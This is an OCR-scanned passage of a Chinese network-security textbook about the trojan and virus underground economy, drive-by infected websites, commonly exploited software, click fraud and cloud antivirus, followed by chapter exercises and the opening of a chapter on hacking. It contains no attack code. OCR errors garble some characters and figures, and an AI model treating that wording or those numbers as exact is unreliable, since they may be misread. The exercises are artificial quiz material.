份 ， 对 1 万 台 上 网 电脑 的 抽样 调查 ， 发 现 这 些 电脑 每 天 遇 到 的 挂 马 网 站 ， 高 峰 期 达到 8428 
个 , 最 低 也 有 1689 个 ,考虑 单 台 电脑 访问 多 个 挂 马 网 站 的 可 能 , 平均 每 天 也 有 30% 的 网 民 
访问 过 挂 马 网 站 ， 中 国内 地 已 经 成 为 全 球 盗号 木马 最 独 狐 的 地 区 之 一 。 

360 安全 专家 石 晓 虹 博士 公开 表示 : 整个 地 下 木马 产业 从 业 人 员 已 接近 百 万 的 规模 ， 
仅 2008 年 一 年 就 制造 了 各 种 则 在 盗号 、 盗 隐私 、 抓 “肉鸡 ”的 木马 为 9743122 种 ! 

目前 流行 的 各 种 热门 网 站 、 客 户 端 软件 和 浏览 器 ， 都 存在 着 众多 漏洞 和 安全 薄弱 点 ， 
使 得 用 户 遭 受 攻击 的 儿 率 大 大 增加 。 而 且 ， 随 着 黑客 一 病毒 产业 链 忠 于 完善 ， 支 撑 互 联网 
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发 展 的 多 种 商业 模式 都 遭 到 了 盗号 木马 、 木 马 点 击 器 的 侵袭 ， 使 得 用 户 对 于 网 络 购物 、 网 
络 支付 、 网 游 产业 的 安全 信心 遭 到 重创 ， 必 会 影响 整个 互联 网 的 健康 、 有 序 的 发 展 。 


1.3.3 ”计算 机 病毒 、 木 马 的 特点 分 析 


1. 病毒 制造 趋 于 “机 械 化 ” 

“病毒 制造 机 ”是 网 上 流行 的 一 种 制造 病毒 的 工具 ， 一 个 人 不 需要 任何 专业 技术 就 可 
以 手工 制造 生成 病毒 。 黑 客 便 可 根据 自己 对 病毒 的 需求 ， 很 简单 地 在 相应 的 制作 工具 中 定 
制 病毒 功能 。 病 毒 傻瓜 式 的 制作 导致 病毒 进入 “机 械 化 ”时 代 。 

病毒 的 机 械 化 生产 导致 病毒 数量 的 爆炸 式 增长 。 反 病毒 厂商 传统 的 人 工 收集 以 及 鉴定 
方法 已 经 无 法 应 对 迅猛 增长 的 病毒 。 

2. 病毒 制造 具有 了 明显 的 模块 化 、 专 业 化 特征 


黑客 组 织 按 功 能 模块 发 外 包 生 产 或 采购 技术 先进 的 病毒 功能 模块 ， 使 得 病毒 的 各 方面 
功能 都 越 来 越 “ 专 业 ”， 病 毒 技 术 得 以 持续 提高 和 发 展 ， 对 网 民 的 危害 越 来 越 大 ， 而 解决 
问题 也 越 来 越 难 。 例 如 2008 年 年 底 出 现 的 “超级 AV 终结 者 ” 集 病毒 技术 之 大 成 ， 是 模块 
化 生产 的 典型 代表 。 

在 专业 化 方面 ， 目 前 的 病毒 产业 链条 由 四 个 部 分 组 成 : 挖掘 安全 漏洞 、 制 造 网 页 木马 、 
制造 盗号 木马 、 制 造 木马 下 载 器 (病毒 下 载 者 )。 这 些 环节 形成 了 分 工 明 确 、 效 率 快捷 的 工 
业 化 “生产 线 ”， 每 个 环节 各 司 其 职 ， 专 业 化 趋势 明显 。 

3. 病毒 产业 互联 网 化 

黑客 组 织 运营 模式 已 经 完全 互联 网 化 ， 攻 击 的 方式 一 般 为 : 网 站 入 侵 一 植 入 木马 一 网 
民 访 问 挂 马 网 站 一 受到 漏洞 攻击 而 “不 知 不 觉 ” 中 毒 。 这 种 传播 方式 的 特点 是 快速 、 隐 项 
性 强 、 适 合 商业 化 运营 。 

由 于 病毒 制造 、 传 播 、 件 利 的 流程 完全 互联 网 化 ， 比 传统 的 黑客 行为 更 容易 带 来 经 济 
利益 。 目 前 已 经 形成 了 一 个 巨大 无 比 的 黑色 产业 ， 黑 客 可 以 选择 自己 擅长 的 环节 运作 ， 从 
而 使 得 产业 的 运作 效率 更 高 。 

从 统计 数据 来 看 ， 活 跃 病 毒 中 90% 以 上 都 与 经 济 利益 直 接 挂 钩 。 从 网 页 挂 马 占 到 病毒 
传播 总 量 90% 以 上 这 个 明显 的 特征 我 们 可 以 看 出 ， 互 联网 最 为 基础 、 最 为 普遍 的 应 用 一 一 
网 页 浏览 是 黑客 利用 的 最 为 深入 透彻 的 传播 渠道 。 如 图 1-5 所 示 ， 我 们 可 以 简单 了 解 病毒 
产业 是 如 何 互 联网 化 的 。 

1) “漏洞 的 挖掘 和 交易 

软件 存在 安全 漏洞 是 当前 病毒 传播 的 一 个 重要 前 提 ， 通 过 用 户 电 脑 系 统 中 安装 的 软件 
存在 的 漏洞 ， 病 毒 可 以 快速 地 在 用 户 不 知情 的 情况 下 进入 用 户 电脑 。 现 在 ， 软 件 漏洞 挖掘 
已 经 成 为 病毒 产业 链 里 的 一 环 。 

黑客 专门 从 系统 上 寻找 漏洞 ， 之 后 到 地 下 交易 网 站 进行 出 售 ， 从 而 获得 不 菲 的 黑色 
收入 。 

黑客 组 织 购 买 了 漏洞 信息 后 ， 利 用 这 些 信息 编 写 强大 的 新 病毒 ， 在 软件 厂商 还 毫 无 觉 
察 时 , 新 病毒 已 经 在 互联 网 上 大 量 传播 , 因此 不 能 及 时 提供 修复 补丁 , 造成 0day 攻击 蔓延 。 
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2) ”网 页 挂 马 的 策略 

目前 ， 病 毒 一 般 不 能 进行 主动 传播 ， 绝 大 多 数 木马 、 后 门 都 是 通过 网 页 挂 马 进 行 的 ， 
它 是 一 种 “被 动 ”的 病毒 传播 方式 ， 用 户 只 有 去 访问 挂 马 网 站 ， 才 会 遭 到 木马 病毒 的 侵袭 。 

为 了 让 更 多 的 用 户主 动 访问 挂 马 网 站 ， 黑 客 采用 多 种 方式 来 提高 挂 马 网 站 的 流量 ， 以 
某 中 文 网 被 “ 挂 马 ” 为 例 ， 它 的 页 面 访问 量 每 天 接近 100 万 , 在 2009 年 3 月 11 一 12 日 间 ， 
因 未 打 补 丁 而 导致 “中 马 ” 的 用 户 很 快 突破 了 12 万 ， 其 中 如 果 有 一 半 用 户 玩 网 游 ， 他 们 都 
将 面临 账号 失窃 的 风险 ， 保 守 估 计 ， 黑 客 组 织 也 可 盗 取 3 万 以 上 的 游戏 账户 ， 一 个 游戏 账 
户 可 以 卖 到 50 元 以 上 , 而 攻 下 这 类 安全 性 较 低 的 网 站 花 销 不 过 数 千 元 , 一 次 成 功 的 入 侵 带 
来 的 利润 可 想 而 知 ， 而 如 果 向 色情 网 站 或 个 人 网 站 购买 100 万 流量 ， 也 仅仅 需要 1 万 元 左 
右 。 有 的 黑客 组 织 ， 会 雇佣 专门 的 人 去 入 侵 正 常 网 站 ， 如 门户 网 站 、 新 闻 网 站 、 热 门 论坛 
等 ， 在 其 中 植 入 木马 ， 或 者 对 自己 的 挂 马 网 站 进行 SEO 优化 。 当 用 户 搜索 “美女 ”、“ 电 
影 ”等 热门 关键 词 的 时 候 ， 这 些 带 毒 网 站 会 排 在 搜索 结果 的 前 几 页 ， 从 而 带 来 大 量 的 用 户 。 
还 有 利用 新 兴 的 SNS 网 站 散发 挂 马 链接 ， 通 过 站 内 信 、 博 客 回帖 等 形式 ， 吸 引 网 民 访 问 。 
现在 热门 的 Web 2.0 网 站 ， 几 乎 都 遭 到 过 此 类 带 毒 链接 的 侵扰 。 

3) 网 页 挂 马 常用 的 漏洞 

目前 ， 黑 客 仍然 利用 漏洞 传播 木马 ,主要 手段 是 网 页 挂 马 , 但 RealPlayer、 迅雷 、PPlive 
等 流行 软件 出 现 的 严重 漏洞 ， 也 被 黑客 利用 传播 木马 。2008 年 4 月 份 爆 出 的 Adobe Flash 
Player 漏洞 成 为 当年 最 为 流行 的 漏洞 ， 有 18% 的 木马 通过 该 漏洞 侵入 用 户 电脑 。 

只 有 不 良 网 站 才 会 带 毒 、 才 会 被 挂 马 ， 坚 持 良 好 的 浏览 习惯 ， 就 可 以 躲避 盗号 木马 等 
病毒 的 侵袭 ， 这 样 的 观念 已 经 过 时 ， 那 些 所 谓 的 “正常 网 站 、 大 中 型 网 站 ， 还 有 明星 粉丝 
4 聚集 地 ”正在 整个 木马 链条 中 发 挥 着 越 来 越 重要 的 作用 。 

根据 瑞星 统计 ，2008 年 黑客 常用 的 各 种 漏洞 共有 16 个 (统计 情况 如 表 1-1 所 示 )， 正 是 
因为 这 些 漏洞 的 存在 ， 而 且 用 户 又 没有 安装 漏洞 补丁 ， 就 使 得 木马 病毒 很 容易 地 侵入 用 户 
电脑 。 


表 1-1 常用 软件 被 利用 统计 表 


漏洞 名 称 在 被 利用 漏洞 中 所 占 比例 
Adobe Flash Player 18% 
RealPlayer 10/11 10% 
Microsoft Date Access Components (ms06-014- 8% 
Windows ant (ms07-017) 8% 
迅雷 看 看 ActiveX 7% 
暴风 影音 I[ ActiveX 7% 
PPlive ActiveX 7% 
PPS ActiveX 7% 
Microsoft Office 2003 (ms08-011) 5% 
Microsoft Office (ms08-056) 5% 
Windows Media Player (ms08-053) 3% 
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续 表 
漏洞 名 称 在 被 利用 漏洞 中 所 占 比 例 
Microsoft GDI+ (ms08-021) 3% 
超星 阅读 器 ActiveX 3% 
联众 世界 ActiveX 3% 
新 浪 ActiveX 3% 
百度 搜 堪 ActiveX 3% 


说 明 ;， 以 上 数据 来 源 于 瑞星 全 球 反 病毒 监测 网 

有 鉴于 此 ， 安 全 专家 提醒 : 弥补 漏洞 (包括 系统 漏洞 、 浏 览 器 漏洞 和 应 用 软件 漏洞 ) 应 
该 成 为 提升 互联 网 安全 的 重要 举措 。 而 通过 宣传 ， 帮 助 用 户 提高 安全 意识 、 开 发 可 靠 的 第 
三 方 漏洞 弥补 工具 ， 也 应 成 为 安全 厂商 应 该 承担 的 重要 社会 责任 。 


1.3.4 ”病毒 互联 网 化 的 影响 


近年 来 ， 随 着 “病毒 互联 网 化 ”的 深入 发 展 ， 黑 客 采 用 大 量 病毒 洪水 式 攻击 用 户 电 脑 


的 事件 时 有 发 生 。 所 谓 “ 洪 水 战术 ”， 就 是 指 黑客 通过 对 盗号 木马 的 频繁 升级 ， 试 图 以 数 
量 来 拖 垮 杀 毒 软件 。 


1. 互联 网 化 制造 病毒 的 三 大 手段 

病毒 产业 的 互联 网 化 ， 使 得 黑客 可 以 利用 互联 网 来 加 速 病毒 的 制造 ， 提 高 制造 病毒 的 
效率 。 黑 客 常 用 的 3 大 手段 如 下 。 

(1) 采用 效率 更 高 的 病毒 生产 软件 ， 这 些 软件 可 以 通过 加 过 、 加 花 等 方式 ， 把 已 有 病 
毒 改造 成 杀毒 软件 无 法 识别 的 版 本 ， 从 而 可 以 自动 生产 出 大 量 新 木马 病毒 。 这 类 机 器 自动 
制造 的 病毒 ， 占 据 了 新 增 病 毒 的 很 大 部 分 。 
(2) 租用 更 好 的 服务 器 、 更 大 的 带宽 ， 为 “木马 下 载 器 ”下 载 病毒 提供 硬件 上 的 便利 。 
由 于 黑客 产业 的 丰厚 利润 ， 黑 客 团伙 有 经 济 条 件 改善 自己 的 “生产 环境 ”， 以 求 得 更 丰厚 
的 利润 。 
(3) 利用 互联 网 论坛 、 博 客 等 ， 雇 佣 “ 软 件 民工 ”来 编写 更 强 的 驱动 ， 加 入 木马 中 与 
杀毒 软件 对 抗 。 现 在 很 多 木马 病毒 都 会 自 带 Rootkits 驱动 ， 这 些 驱动 可 以 关闭 杀毒 软件 、 
修改 系统 设置 和 文件 , 使 木马 更 容易 入 侵 用 户 电脑 。 而 编写 Rootkits 在 很 大 程度 上 属于 “ 体 
力 劳动 ”， 普 通 计算 机 专业 大 学 生 经 过 儿 个 月 的 编程 训练 即 可 胜任 此 工作 。 大 量 软 件 民工 
4 加 入 ， 使 得 黑客 产业 链条 更 趋向 “正规 化 、 专 业 化 ”， 效 率 也 更 高 。 

2. 病毒 互联 网 化 的 影响 

病毒 制造 的 互联 网 化 ， 使 得 整个 黑客 产业 制造 病毒 的 效率 大 大 提高 ， 从 而 给 反 病毒 三 
商 带 来 很 多 问题 。 主 要 问题 如 下 。 

(1) 新 病毒 巨 量 增加 、 单 个 病毒 的 生存 期 缩短 ， 现 有 病毒 监测 技术 无 法 及 时 截获 新 


样本 


(2) 即使 能 够 截获 ， 但 每 天 高 达 数 十 万 的 新 样本 数量 ， 也 在 严重 考验 着 反 病毒 厂商 对 
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于 病毒 的 分 析 和 处 理 能 力 。 

(3) 即使 能 够 分 析 处 理 ， 但 如 何 能 够 让 用 户 在 最 短 时 间 内 获取 相应 的 病毒 库 ， 将 成 为 
一 个 重要 的 问题 。 

针对 以 上 的 问题 ， 杀 毒 软件 的 设计 思想 、 设 计 初 衷 就 会 面临 巨大 的 改变 : 应 该 把 病毒 
阻挡 在 电脑 之 外 ， 在 盗号 木马 、 病 毒 刚刚 出 现在 互联 网 上 ， 还 没有 来 得 及 对 客户 端 (用 户 电 
脑 ) 发 动 攻击 时 即将 其 屏蔽 。 这 种 技术 的 实现 ， 需 要 杀毒 软件 的 完全 互联 网 化 ， 让 互联 网 本 
身 成 为 一 个 巨大 的 杀毒 软件 。 

3. 直接 影响 用 户 对 整个 互联 网 行业 的 信心 

随 着 黑客 产业 链 的 完善 ， 越 来 越 多 的 黑客 通过 操作 木马 病毒 的 方式 来 介入 正常 的 互联 
网 商业 领域 ， 包 括 搜 索引 擎 、 网 址 站 、 视 频 网 站 等 ， 都 已 遭 到 此 类 恶性 行为 的 “感染 ”， 
严重 影响 了 用 户 对 于 整个 互联 网 行业 的 信心 。 

1) “木马 点 击 器 侵袭 搜索 引擎 

2008 年 年 初 以 来 ， 互 联网 上 的 Clicker( 木 马 点 击 器 ) 类 病毒 出 现 异 常 增长 ，2008 年 1 月 
至 10 月 ， 瑞 星 病毒 监测 网 络 共 截 获 单纯 性 Clicker 病毒 19 万 个 ， 包 含 Clicker 功能 的 复合 
型 木马 将 近 100 万 。 如 此 巨 量 的 病毒 出 现 ， 意 味 着 其 背后 拥有 丰厚 的 黑色 收益 。 

据 某国 外 机 构 统 计 ， 目 前 互联 网 上 广告 总 点 击 率 的 35% 来 自 于 “点 击 欺诈 ”， 该 机 构 

告 说 ， “点击 欺诈 ”甚至 会 摧毁 这 一 热门 的 网 络 商业 模式 。 而 按照 点 击 效果 付费 ， 正 是 
百度 、 谷 歌 等 互联 网 搜索 引擎 生存 的 基础 。 

“Clicker 病毒 ”中 文 名 叫做 木马 点 击 器 ， 它 们 侵入 用 户 电脑 后 ， 会 根据 病毒 编写 者 预 
先 设 定 的 网 址 ， 去 点 击 网 上 的 广告 ， 如 百度 竞价 排名 、Google Ad Sense 等 ， 让 广告 主 支付 
更 多 的 广告 费 ， 而 病毒 犯罪 团伙 及 其 合作 伙伴 则 会 分 享 这 些 额 外 的 “利润 ”。 

这 只 是 “点 击 欺诈 ”最 简单 的 牟利 方式 ， 还 有 其 他 各 种 各 样 的 黑色 商业 模式 ， 包 括 有 
的 公司 向 黑客 团伙 购买 中 毒 机 器 的 使 用 权 ， 对 竞争 对 手 的 “竞价 排名 ”广告 进行 恶意 点 击 ， 
从 而 大 量 消耗 对 手 的 广告 资金 等 。 这 些 “ 点 击 欺诈 ”重创 了 广告 主 对 互联 网 广告 的 信心 ， 
可 能 拒绝 再 为 此 付费 。 

2) ”Flash 插件 漏洞 侵袭 视频 网 站 

2008 年 5 月 ， 利 用 浏览 器 插件 Flash Player 漏洞 传播 的 攻击 代码 出 现 ， 由 于 该 漏洞 应 
用 起 来 简单 方便 ， 致 使 大 批 木马 病毒 通过 此 漏洞 传播 ， 尤 其 是 “ 挂 马 网 站 ”类 型 的 攻击 被 
黑客 青睐 。 

Flash Player 是 一 种 广泛 应 用 在 正 、fire fox 等 主流 浏览 器 上 的 插件 , 用 户 只 有 安装 了 该 
插件 之 后 ， 才 能 正常 浏览 网 络 视 频 、 网 络 广告 、 玩 网 页 游戏 等 ， 当 用 户 第 一 次 访问 视频 网 
站 、 网 游 网 站 时 ， 系 统 会 自动 提示 用 户 安装 该 插件 。 

由 于 该 插件 不 具备 自动 升级 机 制 ， 很 多 用 户 在 安装 了 旧版 插件 之 后 根本 不 能 升级 。 尽 
管 在 Flash Player 插件 漏洞 出 现 后 的 很 短 时 间 ，Adobe 公司 就 开发 了 新 版 插件 弥补 了 漏洞 ， 
但 绝 大 多 数 用 户 用 的 还 是 旧版 插件 ， 没 有 升级 。 

根据 瑞星 统计 ， 截 至 2008 年 6 月 15 日 ，Adobe 公司 发 布 安全 插件 之 后 的 两 个 月 ， 安 
装 新 版 插件 的 用 户 仅 有 38.59%。 经 过 瑞星 等 公司 进行 大 规模 新 闻 宣 传 、 通 过 杀毒 软件 的 信 
息 中 心 进行 告知 后 ，7 月 5 日 的 统计 表明 ， 安 装 了 新 版 插件 的 用 户 上 升 到 53%， 仍 有 47% 
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的 用 户 使 用 带 有 漏洞 的 插件 。 

这 样 的 事实 说 明 ， 在 现 有 的 网 络 环境 下 ， 网 民 的 安全 意识 相对 薄弱 ， 或 者 是 缺乏 获取 
相关 信息 的 渠道 ， 难 以 应 对 复杂 多 变 的 网 络 安全 形势 。 而 且 ， 由 于 视频 网 站 、 网 页 游戏 、 
SNS 等 新 型 网 站 越 来 越 多 ， 此 类 网 站 多 数 会 开发 基于 自己 的 客户 端 插件 ， 而 这 些 插件 在 设 
计 初 始 就 以 实现 功能 为 主 ， 对 于 安全 防范 的 设计 很 少 ， 这 可 能 会 给 用 户 安全 带 来 很 大 的 

3) “木马 带 来 假 流量 ， 动 摇 新 经 济 基础 

Clicker( 木 马 点 击 器 ) 除 了 会 点 击 网 络 广告 , 获取 不 正当 收益 之 外 , 还 会 出 售 一 种 特殊 的 
商品 “流量 ”。 所 谓 流 量 ， 指 的 是 网 页 点 击 率 ， 进 而 通过 点 击 率 来 影响 网 站 的 全 球 排名 。 

例如 ， 某 黑客 可 以 创立 一 家 新 概念 的 网 站 ， 如 视频 、 交 友 等 具有 “概念 ”的 网 站 ， 再 
制造 “木马 点 击 器 ”病毒 ， 把 网 站 的 地 址 预 置 到 病毒 之 中 ， 让 这 些 病毒 去 感染 数 十 万 、 上 
百 万 的 用 户 电脑 。 然 后 ， 这 些 中 毒 电 脑 就 会 自动 去 点 击 指定 的 网 站 。 

一 个 新 型 网 站 创建 伊始 就 能 有 数 十 万 的 点 击 量 ， 黑 客 就 可 借 此 来 吸引 风险 投资 。 即 使 
不 能 获取 风险 投资 的 信赖 ， 也 可 以 拿 去 欺骗 广告 商 ， 或 者 干脆 参加 谷歌 、 百 度 等 公司 的 广 
告 联盟 ， 分 享 无 风险 利润 。 

因此 互联 网 广告 、 风 险 投 资 等 多 个 领域 不 可 避免 地 会 遭 到 严重 冲击 。 广 告 商 由 于 无 法 
评估 广告 的 效果 而 收 紧 预算 ， 风 险 投 资 对 网 站 的 真实 价值 产生 怀疑 而 不 敢 投资 ， 可 以 说 ， 
木马 病毒 已 经 成 为 阻碍 互联 网 经 济 发 展 的 重要 因素 之 一 ， 它 影响 的 是 网 络 经 济 的 “诚信 ”。 

4) ”盗号 木马 危及 网 游 、 网 银 等 

瑞星 公司 的 统计 数据 表明 ，2008 年 前 10 个 月 ， 互 联网 上 共 出 现 930 余 万 新 病毒 ， 其 
中 木马 病毒 和 后 门 病毒 共计 776 万 ， 占 总 体 病 毒 的 83.4%。 这 些 病毒 主要 以 窃取 网 络 游戏 、 
网 络 银行 等 虚拟 财产 为 主 。 

由 于 现在 黑客 产业 链 极为 发 达 ， 黑 客 们 通过 分 工 合作 ， 可 以 轻易 将 窃取 的 各 种 账号 、 
装备 出 售 ， 换 取 大 量 钱 财 。 据 媒体 报道 ， 近 期 被 警方 破获 的 某 黑客 团伙 ， 从 2007 年 12 月 
以 来 就 通过 传播 盗号 木马 ， 盗 窃 游 戏 账 号 2000 余 万 封 (黑客 们 把 被 窃 账号 叫做 “信封 ”)， 
非法 获 利 数 百 万 元 。 

对 于 网 游玩 家 和 网 游 公司 来 讲 ， 此 类 犯罪 活动 严重 影响 着 他 们 各 自 的 利益 。 玩 家 往往 
会 在 一 款 游戏 上 投入 了 大 量 金 钱 和 精力 ， 结 果 被 盗号 木马 洗 动 一 空 。 而 且 大 量 被 盗 玩 家 的 
申诉 ， 也 影响 了 网 游 公司 的 正常 业务 ， 一 个 大 型 网 游 公司 为 了 应 付 盗 号 而 投入 的 研发 、 人 
力 、 客 服 等 成 本 ， 每 年 就 高 达 数 千 万 元 。 

5) ”盗号 木马 侵袭 网 络 下 载 

通过 网 络 下 载 视频 、 音 乐 等 ， 已 经 成 为 国内 网 民 最 为 热门 的 上 网 目的 。 但 是 对 于 用 户 
来 讲 ， 下 载 也 是 招来 盗号 木马 的 重要 渠道 之 一 。 

目前 所 有 的 主流 下 载 软件 ， 都 存在 着 或 多 或 少 的 漏洞 ， 这 些 漏洞 可 能 被 挂 马 网 站 利用 ， 
和 户 安装 了 下 载 软件 之 后 ， 再 去 上 网 就 可 能 中 毒 。 

目前 的 视频 文件 中 存在 着 捆绑 病毒 的 风险 , 在 mnvb 等 主流 格式 的 视频 文件 中 , 可 被 捆 
绑 盗 号 木马 、 弹 窗 广告 等 ， 这 些 恶 意 程 序 在 用 户 下 载 后 ， 就 可 能 感染 用 户 电 脑 。 

由 于 某 些 下 载 软件 提供 P2P 共享 功能 ， 用 户 可 以 通过 搜索 其 他 人 的 共享 文件 夹 来 找到 
自己 喜欢 的 文件 。 利 用 此 功能 ， 有 些 木马 会 主动 把 自己 复制 到 下 载 软件 的 共享 文件 夹 中 ， 
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起 一 个 诱惑 性 的 名 字 ， 使 用 华丽 的 图 标 ， 欺 骗 别 的 用 户主 动 进行 下 载 ， 从 而 使 下 载 软件 本 
身 成 为 病毒 传播 的 渠道 。 


1.3.5 ” 反 病 毒 技术 发 展 趋势 


在 病毒 制作 日 益 机 械 化 、 产 业 化 ， 病 毒 、 木 马 数量 的 激增 ， 反 病毒 厂商 与 病毒 之 间 的 
对 抗 更 加 激烈 的 大 环境 下 , 传统 杀毒 软件 的 运营 模式 : 获取 样本 一 特征 码 分 析 一 更 新 部 署 ， 
己 无 法 满足 抵御 日 益 变化 、 不 断 增 长 的 安全 威胁 的 需要 ， 若 不 进行 变革 ， 互 联网 的 各 项 基 
础 应 用 和 发 展 必 将 遭受 极 大 的 冲击 。 

“ 云 安全 (Cloud Security)” 计 划 是 网 络 时 代 信 息 安全 的 最 新 体现 ， 它 融合 了 并 行 处 理 、 
网 格 计算 、 未 知 病毒 行为 判断 等 新 兴 技 术 和 概念 ， 通 过 网 状 的 大 量 客户 端 对 网 络 中 软件 行 
为 的 异常 监测 ， 获 取 互 联网 中 木马 、 恶 意 程序 的 最 新 信息 ， 推 送 到 服务 器 端 进行 自动 分 析 
和 处 理 ， 再 把 病毒 和 木马 的 解决 方案 分 发 到 每 一 个 客户 端 。 云 安全 是 我 国企 业 创造 的 概念 ， 
在 国际 云 计 算 领域 独树一帜 。 

“ 云 安 全 ”技术 应 用 后 ， 识 别 和 查 杀 病毒 不 再 仅仅 依靠 本 地 硬盘 中 的 病毒 库 ， 而 是 依 
靠 庞大 的 网 络 服务 ， 实 时 进行 采集 、 分 析 以 及 处 理 。 整 个 互联 网 就 是 一 个 巨大 的 “杀毒 软 
件 ”， 参 与 者 越 多 ， 每 个 参与 者 就 越 安全 ， 整 个 互联 网 也 就 会 更 安全 。 

目前 , 瑞星 、 趋 势 、 卡 巴 斯 基 、 麦 咖啡 、 赛 门 铁 克 、 江 民 科技 、 熊 猫 杀 毒 、 金 山 、360 安 
全 卫士 、 卡 卡 上 网 安全 助手 等 众多 杀毒 厂商 都 在 布局 “ 云 安全 ”领域 ， 相 继 推 出 了 各 自 的 
“ 云 安全 ”解决 方案 。 瑞 星 基于 “ 云 安全 ”策略 开发 的 2009 新 品 ， 每 天 拦截 数 百 万 次 木马 
攻击 ， 其 中 2009 年 1 月 8 日 一 天 就 达到 了 765 万 余 次 。 趋 势 科 技 “ 云 安全 ”已 经 在 全 球 建 
立 了 5 大 数据 中 心 ， 几 万 部 在 线 服务 器 。 据 悉 , “ 云 安全 ”可 以 支持 平均 每 天 55 亿 条 点 击 
查询 , 每 天 收集 分 析 2.5 亿 个 样本 , 数据 库 第 一 次 命中 率 就 可 以 达到 99%。 借助 “ 云 安全 ”， 
趋势 科技 现在 每 天 阻 断 的 病毒 感染 最 高 达 1000 万 次 。 我 们 有 理由 相信 ，“ 云 安全 ”将 是 大 
势 所 趋 ， 而 “ 云 安 全 ”时 代 的 到 来 ， 也 必 将 伴随 着 安全 行业 的 一 场 巨大 变革 。 


小 结 
本 章 主要 介绍 了 网 络 安全 的 概念 和 定义 ， 从 物理 安全 、 网 络 结构 安全 、 系 统 安全 、 应 
系统 安全 和 管理 安全 等 方面 对 网 络 安全 进行 了 全 面 的 分 析 。 介 绍 了 网 络 安全 的 现状 ， 计 


算 机 病毒 、 木 马 的 发 展 趋势 以 及 对 互联 网 应 用 的 影响 ， 进 一 步 介绍 了 目前 最 新 的 反 病 毒 技 
术 。 通 过 本 章 的 学 习 ， 学 生 可 以 了 解 网 络 安全 存在 的 隐患 和 发 展 趋势 。 


本 章 习 题 


一 、 多 项 选择 题 


1. 网 络 威胁 因素 主要 有 以 下 几 个 方面 ( 。 ). 
A. 硬件 设备 和 线路 的 安全 问题 


B. 网 络 系统 和 软件 的 安全 问题 
C. 网 络 管理 人 员 的 安全 意识 问题 
D. 环境 的 安全 因素 
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2. 计算 机 病毒 的 特征 ( 。 )。 

A. 可 执行 性 B. 隐 项 性 、 传 染 性 C. 潜伏 性 

D. 表现 性 或 破坏 性 E. 可 触发 性 
3. 计算 机 病毒 的 传播 途径 ( 。 )。 

A. 通过 软盘 和 光盘 传播 

B. 通过 硬盘 传播 

C. 通过 计算 机 网 络 进行 传播 
4. 许多 黑客 攻击 都 是 利用 软件 实现 中 的 缓冲 区 溢出 的 漏洞 ， 对 于 这 一 威胁 ， 最 可 靠 

的 解决 方案 是 (。”)。 

A. 安装 防 病毒 软件 B. 给 系统 安装 最 新 的 补丁 

C. 安装 防火 墙 D. 安装 入 侵 检 测 系 统 
5. 计算 机 病毒 的 主要 来 源 有 (  ” )。 

A. 黑客 组 织 编写 B. 恶作剧 

C. 计算 机 自动 产生 D. 恶意 编制 
6. 计算 机 病毒 不 是 ( )。 

A. 计算 机 程序 ”B. 临时 文件 C. 应 用 软件 D. 数据 
7. 计算 机 病毒 的 危害 性 有 以 下 几 种 表现 ( 。”)。 

A. 烧毁 主板 B. 删除 数据 C. 阻塞 网 络 D. 信息 泄露 
8. 目前 使 用 的 防 杀 病毒 软件 的 作用 是 ( % 

A. 检查 计算 机 是 否 感 染病 毒 ， 清 除 已 感染 的 任何 病毒 

B. 杜绝 病毒 对 计算 机 的 侵害 

C. 检查 计算 机 是 否 感染 病毒 ， 清 除 部 分 已 感染 的 病毒 

D. 查 出 已 感染 的 任何 病毒 ， 清 除 部 分 已 感染 的 病毒 
9. 计算 机 病毒 破坏 的 主要 对 象 是 (  )。 

A. 软盘 B. 磁盘 驱动 器 C.CPU D. 程序 和 数据 
10， 网 络 黑客 的 攻击 方法 有 (  )。 

A. WWW 的 欺骗 技术 B. 网 络 监听 

C. 丛 取 特权 D. 利用 账号 进行 攻击 
二 、 判 断 题 
1. 新 买 回来 的 从 未 格式 化 的 口 盘 可 能 会 带 有 计算 机 病毒 。 ( ) 
2. 网 络 防 火 墙 主要 用 于 防止 网 络 中 的 计算 机 病毒 。 ( 村 
3. 安装 了 防 病 毒 软件 后 ， 还 必须 经 常 对 防 病 毒 软件 升级 。 《1 
4.” 当 发 现 入 侵 行为 后 ， 入 侵 检测 系统 可 采用 特殊 方式 提醒 管理 者 ， 并 阻 断 网 络 。 

( ) 

5. “ 云 安全 ”技术 应 用 后 ， 识 别 和 查 杀 病毒 不 再 仅仅 依靠 本 地 硬盘 中 的 病毒 库 ， 而 
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是 依靠 庞大 的 网 络 服务 ， 实 时 进行 采集 、 分 析 以 及 处 理 。 
三 、 简 答题 


1. 网 络 安全 有 哪些 基本 特征 ? 
2. 网 络 安全 涉及 哪些 方面 ? 
3. 当前 网 络 病毒 有 什么 新 特点 ? 针对 这 些 特点 应 该 如 何 防治 ? 
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第 2 章 ”网 络 攻击 与 防范 


【本 章 要 点 】 
随 着 Intemet 的 日 益 发 展 ， 了 解 网 络 攻 击 的 方式 以 及 防范 方法 已 经 成 为 必然 。 本章 主 要 
介绍 常见 的 网 络 攻击 方式 以 及 防范 方法 ， 黑 客 的 攻击 方法 可 作为 了 解 内 容 。 要 重点 掌握 攻 
击 的 步骤 以 及 留 后 门 清 痕 迹 的 方法 ， 然 后 通过 练习 题 加 以 复习 和 巩固 。 


2.1 黑客 概述 


近年 来 mtemet 在 全 球 的 迅猛 发 展 为 人 们 提供 了 方便 、 自 由 和 无 限 的 财富 。 政治 、 军事 、 
经 济 、 科 技 、 教 育 和 文化 等 各 个 方面 都 越 来 越 网 络 化 ，Intemet 逐渐 成 为 人 们 生活 、 娱 乐 的 
一 部 分 。 可 以 说 ， 信 息 时 代 已 经 到 来 ， 信 息 已 成 为 除 物质 和 能 量 以 外 维持 人 类 社会 的 第 三 
资源 ， 它 是 未 来 生活 中 的 重要 组 成 部 分 。 随 着 计算 机 的 普及 和 因特网 技术 的 迅速 发 展 ， 黑 
客 也 随 之 出 现 了 。 


2.1.1 黑客 的 由 来 


1. 黑客 的 发 展 史 

“黑客 ”这 个 名 词 是 由 英语 Hacker 音译 而 来 。 一 般 认 为 ， 黑 客 起 源 于 20 个 世纪 50 年 
代 麻 省 理工 学 院 的 实验 室 中 。 在 20 世纪 60、70 年 代 ，“ 黑 客 ” 一 词 极 富 况 义 ， 是 指 那 些 
通过 创造 性 方法 来 挑战 脑力 极限 的 人 ， 他 们 对 电脑 全 身心 投入 ， 从 事 黑客 活动 意味 着 对 计 
算 机 的 最 大 潜力 进行 智力 上 的 自由 探索 ， 为 电脑 技术 的 发 展 作 出 了 巨大 贡献 。 正 是 这 些 黑 
